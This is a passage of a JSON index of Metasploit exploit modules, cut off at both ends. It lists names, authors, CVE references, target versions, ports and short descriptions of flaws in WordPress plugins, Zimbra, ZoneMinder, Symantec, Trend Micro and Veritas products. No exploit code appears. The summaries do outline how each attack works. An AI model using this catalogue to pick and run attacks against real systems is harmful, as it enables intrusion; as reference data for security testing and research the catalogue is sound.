8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WP SlideShow Gallery 1.4.6"
],
"mod_time": "2017-12-12 00:33:28 +0000",
"path": "/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_slideshowgallery_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_symposium_shell_upload": {
"name": "WordPress WP Symposium 14.11 Shell Upload",
"full_name": "exploit/unix/webapp/wp_symposium_shell_upload",
"rank": 600,
"disclosure_date": "2014-12-11",
"type": "exploit",
"author": [
"Claudio Viviani",
"rastating"
],
"description": "WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker\n to execute arbitrary PHP code. This flaw exists because the\n /wp-symposium/server/file_upload_form.php script does not properly verify or\n sanitize user-uploaded files. By uploading a .php file, the remote system will\n place the file in a user-accessible path. Making a direct request to the\n uploaded file will allow the attacker to execute the script with the privileges\n of the web server.",
"references": [
"OSVDB-116046",
"WPVDB-7716"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wp-symposium < 14.12"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_symposium_shell_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_total_cache_exec": {
"name": "WordPress W3 Total Cache PHP Code Execution",
"full_name": "exploit/unix/webapp/wp_total_cache_exec",
"rank": 600,
"disclosure_date": "2013-04-17",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"hdm <x@hdm.io>",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module exploits a PHP Code Injection vulnerability against WordPress plugin\n W3 Total Cache for versions up to and including 0.9.2.8. WP Super Cache 1.2 or older\n is also reported as vulnerable. The vulnerability is due to the handling of certain\n macros such as mfunc, which allows arbitrary PHP code injection. A valid post ID is\n needed in order to add the malicious comment. If the POSTID option isn't specified,\n then the module will automatically find or bruteforce one. Also, if anonymous comments\n aren't allowed, then a valid username and password must be provided. In addition,\n the \"A comment is held for moderation\" option on WordPress must be unchecked for\n successful exploitation. This module has been tested against WordPress 3.5 and\n W3 Total Cache 0.9.2.3 on an Ubuntu 10.04 system.",
"references": [
"CVE-2013-2010",
"OSVDB-92652",
"BID-59316",
"URL-http://wordpress.org/support/topic/pwn3d",
"URL-http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/",
"WPVDB-6622"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Wordpress 3.5"
],
"mod_time": "2018-08-20 16:05:58 +0000",
"path": "/modules/exploits/unix/webapp/wp_total_cache_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_total_cache_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_worktheflow_upload": {
"name": "Wordpress Work The Flow Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_worktheflow_upload",
"rank": 600,
"disclosure_date": "2015-03-14",
"type": "exploit",
"author": [
"Claudio Viviani",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin,\n version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"WPVDB-7883",
"EDB-36640",
"PACKETSTORM-131294"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Work The Flow 2.5.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_worktheflow_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_worktheflow_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_wpshop_ecommerce_file_upload": {
"name": "WordPress WPshop eCommerce Arbitrary File Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_wpshop_ecommerce_file_upload",
"rank": 600,
"disclosure_date": "2015-03-09",
"type": "exploit",
"author": [
"g0blin",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin\n from version 1.3.3.3 to 1.3.9.5. It allows uploading arbitrary PHP code to obtain remote\n code execution. This module has been tested successfully on WordPress WPshop eCommerce\n 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.",
"references": [
"WPVDB-7830",
"URL-https://research.g0blin.co.uk/g0blin-00036/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WPshop eCommerce 1.3.9.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_wpshop_ecommerce_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_wptouch_file_upload": {
"name": "WordPress WPTouch Authenticated File Upload",
"full_name": "exploit/unix/webapp/wp_wptouch_file_upload",
"rank": 600,
"disclosure_date": "2014-07-14",
"type": "exploit",
"author": [
"Marc-Alexandre Montpas",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "The WordPress WPTouch plugin contains an authenticated file upload\n vulnerability. A wp-nonce (CSRF token) is created on the backend index\n page and the same token is used on handling ajax file uploads through\n the plugin. By sending the captured nonce with the upload, we can\n upload arbitrary files to the upload folder. Because the plugin also\n uses its own file upload mechanism instead of the WordPress API, it's\n possible to upload any file type.\n The user provided does not need special rights; an account with the \"Contributor\"\n role is sufficient.",
"references": [
"URL-http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html",
"WPVDB-7118"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wptouch < 3.4.3"
],
"mod_time": "2017-09-08 10:04:47 +0000",
"path": "/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_wptouch_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_wysija_newsletters_upload": {
"name": "Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload",
"full_name": "exploit/unix/webapp/wp_wysija_newsletters_upload",
"rank": 600,
"disclosure_date": "2014-07-01",
"type": "exploit",
"author": [
"Marc-Alexandre Montpas",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "The Wordpress plugin \"MailPoet Newsletters\" (wysija-newsletters) before 2.6.8\n is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme\n functionality to upload a zip file containing the payload. The plugin uses the\n admin_init hook, which is also executed for unauthenticated users when accessing\n a specific URL. The first fix for this vulnerability appeared in version 2.6.7,\n but the fix can be bypassed. In PHP's default configuration,\n a POST variable overwrites a GET variable in the $_REQUEST array. The plugin\n uses $_REQUEST to check for access rights. By setting the POST parameter to\n something not beginning with 'wysija_', the check is bypassed. Wordpress uses\n the $_GET array to determine the page, so it is not affected by this. The developers\n applied the fixes to all previous versions too.",
"references": [
"URL-http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html",
"URL-http://www.mailpoet.com/security-update-part-2/",
"URL-https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php",
"WPVDB-6680"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wysija-newsletters < 2.6.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_wysija_newsletters_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/xoda_file_upload": {
"name": "XODA 0.4.5 Arbitrary PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/xoda_file_upload",
"rank": 600,
"disclosure_date": "2012-08-21",
"type": "exploit",
"author": [
"Shai rod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a file upload vulnerability found in XODA 0.4.5. Attackers\n can abuse the \"upload\" command in order to upload a malicious PHP file without any\n authentication, which results in arbitrary code execution. The module has been\n tested successfully on XODA 0.4.5 and Ubuntu 10.04.",
"references": [
"OSVDB-85117",
"BID-55127",
"EDB-20703"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"XODA 0.4.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/xoda_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/xoda_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/zeroshell_exec": {
"name": "ZeroShell Remote Code Execution",
"full_name": "exploit/unix/webapp/zeroshell_exec",
"rank": 600,
"disclosure_date": "2013-09-22",
"type": "exploit",
"author": [
"Yann CAM",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in ZeroShell 2.0 RC2 and lower.\n It will leverage an unauthenticated local file inclusion vulnerability in the\n \"/cgi-bin/kerbynet\" URL. The file retrieved is \"/var/register/system/ldap/rootpw\".\n This file contains the admin password in cleartext. The password is used to log in\n as the admin user. After the authentication process is complete it will use the\n RunScript action to execute the payload with root privileges.",
"references": [
"CVE-2009-0545",
"PACKETSTORM-122799"
],
"platform": "Linux",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ZeroShell 2.0 RC2"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/webapp/zeroshell_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/zeroshell_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/zimbra_lfi": {
"name": "Zimbra Collaboration Server LFI",
"full_name": "exploit/unix/webapp/zimbra_lfi",
"rank": 600,
"disclosure_date": "2013-12-06",
"type": "exploit",
"author": [
"rubina119",
"Mekanismen <mattias@gotroot.eu>"
],
"description": "This module exploits a local file inclusion on Zimbra 8.0.2 and 7.2.2. The vulnerability\n allows an attacker to get the LDAP credentials from the localconfig.xml file. The stolen\n credentials allow the attacker to make requests to the service/admin/soap API. This can\n then be used to create an authentication token for the admin web interface. This access\n can be used to achieve remote code execution. This module has been tested on Zimbra\n Collaboration Server 8.0.2 with Ubuntu Server 12.04.",
"references": [
"CVE-2013-7091",
"OSVDB-100747",
"BID-64149",
"EDB-30085",
"URL-http://cxsecurity.com/issue/WLB-2013120097"
],
"platform": "Linux",
"arch": "",
"rport": 7071,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Zimbra 8.0.2 / Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/zimbra_lfi.rb",
"is_install_path": true,
"ref_name": "unix/webapp/zimbra_lfi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/zoneminder_packagecontrol_exec": {
"name": "ZoneMinder Video Server packageControl Command Execution",
"full_name": "exploit/unix/webapp/zoneminder_packagecontrol_exec",
"rank": 600,
"disclosure_date": "2013-01-22",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command execution vulnerability in ZoneMinder Video\n Server version 1.24.0 to 1.25.0 which could be abused to allow\n authenticated users to execute arbitrary commands under the context of the\n web server user. The 'packageControl' function in the\n 'includes/actions.php' file calls 'exec()' with user controlled data\n from the 'runState' parameter.",
"references": [
"CVE-2013-0232",
"OSVDB-89529",
"EDB-24310",
"URL-http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/zoneminder_packagecontrol_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/zpanel_username_exec": {
"name": "ZPanel 10.0.0.2 htpasswd Module Username Command Execution",
"full_name": "exploit/unix/webapp/zpanel_username_exec",
"rank": 600,
"disclosure_date": "2013-06-07",
"type": "exploit",
"author": [
"shachibista",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in ZPanel's htpasswd module. When\n creating .htaccess using the htpasswd module, the username field is passed on to a\n system() call that runs the system's htpasswd command, so it can be used to\n inject shell commands.\n\n Please note: In order to use this module, you must have a valid account to login\n to ZPanel. An account part of any of the default groups should suffice, such as:\n Administrators, Resellers, or Users (Clients). By default, there's already a\n 'zadmin' user, but the password is randomly generated.",
"references": [
"OSVDB-94038",
"URL-https://github.com/bobsta63/zpanelx/commit/fe9cec7a8164801e2b3755b7abeabdd607f97906",
"URL-http://forums.zpanelcp.com/showthread.php?27898-Serious-Remote-Execution-Exploit-in-Zpanel-10-0-0-2"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ZPanel 10.0.0.2 on Linux"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/unix/webapp/zpanel_username_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/zpanel_username_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/x11/x11_keyboard_exec": {
"name": "X11 Keyboard Command Injection",
"full_name": "exploit/unix/x11/x11_keyboard_exec",
"rank": 600,
"disclosure_date": "2015-07-10",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits open X11 servers by connecting and registering a\n virtual keyboard. The virtual keyboard is used to open an xterm or gnome\n terminal and type and execute the specified payload.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": 6000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"xterm (Generic)",
"gnome-terminal (Ubuntu)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/x11/x11_keyboard_exec.rb",
"is_install_path": true,
"ref_name": "unix/x11/x11_keyboard_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/ams_hndlrsvc": {
"name": "Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution",
"full_name": "exploit/windows/antivirus/ams_hndlrsvc",
"rank": 600,
"disclosure_date": "2010-07-26",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "Symantec System Center Alert Management System is prone to a\n remote command-injection vulnerability because the application fails\n to properly sanitize user-supplied input.",
"references": [
"OSVDB-66807",
"BID-41959",
"URL-http://www.foofus.net/~spider/code/AMS2_072610.txt"
],
"platform": "Windows",
"arch": "",
"rport": 38292,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/ams_hndlrsvc.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/ams_hndlrsvc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/ams_xfr": {
"name": "Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution",
"full_name": "exploit/windows/antivirus/ams_xfr",
"rank": 600,
"disclosure_date": "2009-04-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "Symantec System Center Alert Management System is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.",
"references": [
"CVE-2009-1429",
"BID-34671",
"OSVDB-54157",
"ZDI-09-060",
"URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02"
],
"platform": "Windows",
"arch": "",
"rport": 12174,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/ams_xfr.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/ams_xfr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/symantec_endpoint_manager_rce": {
"name": "Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution",
"full_name": "exploit/windows/antivirus/symantec_endpoint_manager_rce",
"rank": 600,
"disclosure_date": "2014-02-24",
"type": "exploit",
"author": [
"Stefan Viehbock",
"Chris Graham",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager\n versions 11.0, 12.0 and 12.1. By supplying a specially crafted XML external entity (XXE) request, an attacker\n can reach components affected by SQL injection. As xp_cmdshell is enabled in the included\n database instance, it's possible to execute arbitrary system commands on the target\n with SYSTEM privileges.",
"references": [
"CVE-2013-5014",
"CVE-2013-5015",
"OSVDB-103305",
"OSVDB-103306",
"EDB-31853",
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows VBS Stager"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/symantec_endpoint_manager_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/symantec_iao": {
"name": "Symantec Alert Management System Intel Alert Originator Service Buffer Overflow",
"full_name": "exploit/windows/antivirus/symantec_iao",
"rank": 400,
"disclosure_date": "2009-04-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Intel Alert Originator Service msgsys.exe.\n When an attacker sends a specially crafted alert, arbitrary code may be executed.",
"references": [
"CVE-2009-1430",
"OSVDB-54159",
"BID-34674"
],
"platform": "Windows",
"arch": "",
"rport": 38292,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003",
"Windows 2000 All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/symantec_iao.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/symantec_iao",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/symantec_rtvscan": {
"name": "Symantec Remote Management Buffer Overflow",
"full_name": "exploit/windows/antivirus/symantec_rtvscan",
"rank": 400,
"disclosure_date": "2006-05-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Symantec Client Security 3.0.x.\n This module has only been tested against Symantec Client Security 3.0.2\n build 10.0.2.2000.",
"references": [
"CVE-2006-2630",
"OSVDB-25846",
"BID-18107",
"URL-http://research.eeye.com/html/advisories/published/AD20060612.html"
],
"platform": "Windows",
"arch": "",
"rport": 2967,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SCS 3.0.2 build 10.0.2.2000"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/symantec_rtvscan.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/symantec_rtvscan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/symantec_workspace_streaming_exec": {
"name": "Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload",
"full_name": "exploit/windows/antivirus/symantec_workspace_streaming_exec",
"rank": 600,
"disclosure_date": "2014-05-12",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in Symantec Workspace Streaming. The\n vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the\n as_agent.exe service, which allows for uploading arbitrary files under the server root.\n This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order\n to achieve remote code execution. This module has been tested successfully on Symantec\n Workspace Streaming 6.1 SP8 and Windows 2003 SP2, and reported to affect 7.5.0.x.\n The abused services listen in a single-machine deployment and also in the backend role of\n a multiple-machine deployment.",
"references": [
"CVE-2014-1649",
"OSVDB-106923",
"BID-67189",
"ZDI-14-127",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00"
],
"platform": "Java",
"arch": "java",
"rport": 9855,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Workspace Streaming 6.1 SP8 / Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/symantec_workspace_streaming_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/trendmicro_serverprotect": {
"name": "Trend Micro ServerProtect 5.58 Buffer Overflow",
"full_name": "exploit/windows/antivirus/trendmicro_serverprotect",
"rank": 400,
"disclosure_date": "2007-02-20",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.\n By sending a specially crafted RPC request, an attacker could overflow the\n buffer and execute arbitrary code.",
"references": [
"CVE-2007-1070",
"OSVDB-33042",
"BID-22639"
],
"platform": "Windows",
"arch": "",
"rport": 5168,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Trend Micro ServerProtect 5.58 Build 1060"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/trendmicro_serverprotect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/trendmicro_serverprotect_createbinding": {
"name": "Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow",
"full_name": "exploit/windows/antivirus/trendmicro_serverprotect_createbinding",
"rank": 400,
"disclosure_date": "2007-05-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.\n By sending a specially crafted RPC request, an attacker could overflow the\n buffer and execute arbitrary code.",
"references": [
"CVE-2007-2508",
"OSVDB-35790",
"BID-23868"
],
"platform": "Windows",
"arch": "",
"rport": 5168,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Trend Micro ServerProtect 5.58 Build 1060"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/trendmicro_serverprotect_createbinding",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/trendmicro_serverprotect_earthagent": {
"name": "Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow",
"full_name": "exploit/windows/antivirus/trendmicro_serverprotect_earthagent",
"rank": 400,
"disclosure_date": "2007-05-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060\n EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the\n buffer and execute arbitrary code.",
"references": [
"CVE-2007-2508",
"OSVDB-35789",
"BID-23866"
],
"platform": "Windows",
"arch": "",
"rport": 3628,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Trend Micro ServerProtect 5.58 Build 1060"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/trendmicro_serverprotect_earthagent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/arkeia/type77": {
"name": "Arkeia Backup Client Type 77 Overflow (Win32)",
"full_name": "exploit/windows/arkeia/type77",
"rank": 400,
"disclosure_date": "2005-02-18",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the Arkeia backup\n client for the Windows platform. This vulnerability affects\n all versions up to and including 5.3.3.",
"references": [
"CVE-2005-0491",
"OSVDB-14011",
"BID-12594",
"URL-http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html"
],
"platform": "Windows",
"arch": "",
"rport": 617,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Arkeia 5.3.3 and 5.2.27 Windows (All)",
"Arkeia 5.2.27 and 5.1.19 Windows (All)",
"Arkeia 5.3.3 and 5.0.19 Windows (All)",
"Arkeia 5.1.19 and 5.0.19 Windows (All)",
"Arkeia 5.x Windows 2000 English",
"Arkeia 5.x Windows XP English SP0/SP1",
"Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6",
"Arkeia 4.2 Windows 2000 English",
"Arkeia 4.2 Windows XP English SP0/SP1",
"Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6",
"Arkeia 4.2 Windows 2000 German"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/arkeia/type77.rb",
"is_install_path": true,
"ref_name": "windows/arkeia/type77",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/backdoor/energizer_duo_payload": {
"name": "Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution",
"full_name": "exploit/windows/backdoor/energizer_duo_payload",
"rank": 600,
"disclosure_date": "2010-03-05",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module will execute an arbitrary payload against\n any system infected with the Arugizer trojan horse. This\n backdoor was shipped with the software package accompanying\n the Energizer DUO USB battery charger.",
"references": [
"CVE-2010-0103",
"OSVDB-62782",
"US-CERT-VU-154421"
],
"platform": "Windows",
"arch": "",
"rport": 7777,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/backdoor/energizer_duo_payload.rb",
"is_install_path": true,
"ref_name": "windows/backdoor/energizer_duo_payload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/backupexec/name_service": {
"name": "Veritas Backup Exec Name Service Overflow",
"full_name": "exploit/windows/backupexec/name_service",
"rank": 200,
"disclosure_date": "2004-12-16",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the Veritas Backup\n Exec Agent Browser service. This vulnerability occurs when a\n recv() call has a length value too long for the destination\n stack buffer. By sending an agent name value of 63 bytes or\n more, we can overwrite the return address of the recv\n function. Since we only have ~60 bytes of contiguous space\n for shellcode, a tiny findsock payload is sent which uses a\n hardcoded IAT address for the recv() function. This payload\n will then roll the stack back to the beginning of the page,\n recv() the real shellcode into it, and jump to it. This\n module has been tested against Veritas 9.1 SP0, 9.1 SP1, and\n 8.6.",
"references": [
"CVE-2004-1172",
"OSVDB-12418",
"BID-11974",
"URL-http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": 6101,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Veritas BE 9.1 SP0/SP1",
"Veritas BE 8.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/backupexec/name_service.rb",
"is_install_path": true,
"ref_name": "windows/backupexec/name_service",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/backupexec/remote_agent": {
"name": "Veritas Backup Exec Windows Remote Agent Overflow",
"full_name": "exploit/windows/backupexec/remote_agent",
"rank": 500,
"disclosure_date": "2005-06-22",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
